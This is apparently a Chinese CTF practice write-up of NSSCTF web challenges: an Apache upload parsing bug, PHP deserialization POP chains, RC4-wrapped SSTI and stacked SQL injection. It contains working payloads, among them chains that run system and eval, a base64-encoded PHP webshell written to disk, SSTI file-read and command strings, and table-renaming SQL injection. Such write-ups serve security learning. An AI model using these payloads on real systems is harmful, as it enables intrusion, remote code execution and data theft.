NSSCTF-web刷题

[UUCTF 2022 新生赛]ez_upload

Apache解析漏洞，apache cve2017

重点是把文件名改为1.jpg.php就可以将图片解析为php，很抽象，这个洞

蚁剑直接连

[SWPUCTF 2022 新生赛]ez_1zpop

<?php
error_reporting(0);
class dxg
{
function fmm()
{
return "nonono";
}
}

class lt
{
public $impo='hi';
public $md51='weclome';
public $md52='to NSS';
function __construct()
{
$this->impo = new dxg;
}
function __wakeup()
{
$this->impo = new dxg;
return $this->impo->fmm();
}

function __toString()
{
if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
return $this->impo->fmm();
}
function __destruct()
{
echo $this;
}
}

class fin
{
public $a;
public $url = 'https://www.ctfer.vip';
public $title;
function fmm()
{
$b = $this->a;
$b($this->title);
}
}

if (isset($_GET['NSS'])) {
$Data = unserialize($_GET['NSS']);
} else {
highlight_file(__file__);
}

重点是关于md5的弱比较

<?php
error_reporting(0);
class lt
{
   public $impo;
   public $md51="s155964671a";
   public $md52="s214587387a";
}

class fin
{
   public $a="system";
   public $url='https://www.ctfer.vip';
   public $title="cat /flag";
}

$a=new lt();
$b=new fin();
$a->impo=$b;
echo serialize($a);
?>

[MoeCTF 2021]unserialize

<?php

class entrance
{
public $start;

function __construct($start)
{
$this->start = $start;
}

function __destruct()
{
$this->start->helloworld();
}
}

class springboard
{
public $middle;

function __call($name, $arguments)
{
echo $this->middle->hs;
}
}

class evil
{
public $end;

function __construct($end)
{
$this->end = $end;
}

function __get($Attribute)
{
eval($this->end);
}
}

if(isset($_GET['serialize'])) {
unserialize($_GET['serialize']);
} else {
highlight_file(__FILE__);
}

<?php

class entrance
{
    public $start;

}

class springboard
{
    public $middle;

}

class evil
{
    public $end;
}
$a=new entrance();
$b=new springboard();
$c=new evil();
$a->start=$b;
$a->start->middle=$c;
$a->start->middle->end="system('cat /f*');";
echo serialize($a);
?>

[NISACTF 2022]is secret

很有趣的一题，ssti与rc4结合

扫到/secret目录

猜测参数为?secret随便传入一个数值，看报错回显

查看可疑代码

rc4加密给了密钥

import base64
from urllib.parse import quote
def rc4_main(key = "init_key", message = "init_message"):
    # print("RC4加密主函数")
    s_box = rc4_init_sbox(key)
    crypt = str(rc4_excrypt(message, s_box))
    return  crypt
def rc4_init_sbox(key):
    s_box = list(range(256))  
    # print("原来的 s 盒：%s" % s_box)
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    # print("混乱后的 s 盒：%s"% s_box)
    return s_box
def rc4_excrypt(plain, box):
    # print("调用加密程序成功。")
    res = []
    i = j = 0
    for s in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(ord(s) ^ k))
    cipher = "".join(res)
    print("加密后的字符串是：%s" %quote(cipher))
    return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
rc4_main("HereIsTreasure","{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}")
#rc4_main("HereIsTreasure","{{lipsum|attr(\"__globals__\")|attr(\"__getitem__\")(\"os\")|attr(\"popen\")(\"cat /f*\")|attr(\"read\")()}}")
#用这个也行

结果为

加密后的字符串是：.%14%1E%12%C3%A484mg%C2%9C%C3%8B%00%C2%81%C2%8D%C2%B8%C2%97%0B%C2%9EF%3B%C2%88m%C2%AEM5%C2%96%3D%C2%9D%5B%C3%987%C3%AA%12%C2%B4%05%C2%84A%C2%BF%17%C3%9Bh%C3%8F%C2%8F%C3%A1a%0F%C2%AE%09%C2%A0%C2%AEyS%2A%C2%A2d%7C%C2%98/%00%C2%90%C3%A9%03Y%C2%B2%C3%9B%1F%C2%B6H%3D%0A%23%C3%B1%5B%C2%9Cp%C2%AEn%C2%96i%5Dv%7FX%C2%92

然后再传入数值就出了

[天翼杯 2021]esay_eval

一道很有意思的反序列化题目，卡了我一宿

<?php
class A{
public $code = "";
function __call($method,$args){
eval($this->code);

}
function __wakeup(){
$this->code = "";
}
}

class B{
function __destruct(){
echo $this->a->a();
}
}
if(isset($_REQUEST['poc'])){
preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
if (isset($ret[1])) {
foreach ($ret[1] as $i) {
if(intval($i)!==1){
exit("you want to bypass wakeup ? no !");
}
}
unserialize($_REQUEST['poc']);    
}


}else{
highlight_file(__FILE__);
}

构造验证pop

<?php
class A{
    public $code = "";
    function __call($method,$args){
        eval($this->code);
        
    }
    function __wakeup(){
        $this->code = "";
    }
}

class B{
    function __destruct(){
        echo $this->a->a();
    }
}
$a=new A();
$b=new B();
$a->code="phpinfo();";
$b->a=$a;
echo serialize($b);
?>

O:1:"b":2:{s:1:"a";O:1:"a":2:{s:4:"code";s:10:"phpinfo();";}}

能执行那可以做的事就多了，直接上传一句话木马

构造pop

<?php
class A{
    public $code = "";
    function __call($method,$args){
        eval($this->code);
        
    }
    function __wakeup(){
        $this->code = "";
    }
}

class B{
    function __destruct(){
        echo $this->a->a();
    }
}
$a=new A();
$b=new B();
$a->code="fputs(fopen('dotast.php','w'),base64_decode(\"PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ
10pOw==\"));";
$b->a=$a;
echo serialize($b);
?>

O:1:"b":2{s:1:"a";O:1:"a":2{s:4:"code";s:91:"fputs(fopen('dotast.php','w'),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ 10pOw=="));";}}

上传上去后发现权限被限制了，只有var/www/html文件的读取权，然后我尝试使用然后用redis加载提权exp，但没成，因为没有load加载不了exp，然后又尝试过mail加载，试了后才发现PHP info的disable上有mail，最后直接上disable_function一把梭就出了

[强网杯 2019]随便注

总感觉在哪里做过这题，太熟悉了

根据题目提醒，发现存在堆叠注入

继续查看列数据

然后问题就是怎么读取flag了，“1';select flag from `1919810931114514`;"?,但这似乎被过滤了

我看wp有两个思路

一个是利用alter对数据库进行相关的修改，但nss靶场似乎把题目改了，用alter修改会破坏靶场环境

1';alter table words rename words1;alter table 1919810931114514 rename words;alter table words change flag id varchar(60);#

1' or '1'='1

原理就就是

修改words表名为其他的

alter table words rename words1;

修改1919810931114514表名为words

alter table 1919810931114514 rename words;

修改新的words表中的flag列名为id

alter table words change flag id varchar(60);

得到最终payload 1';alter table words rename words1;alter table 1919810931114514 rename words;alter table words change flag id varchar(60);#

第二种思路就是编码和相似函数替代绕过

';SeT @a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;

1';handler `1919810931114514` open;handler `1919810931114514` read next;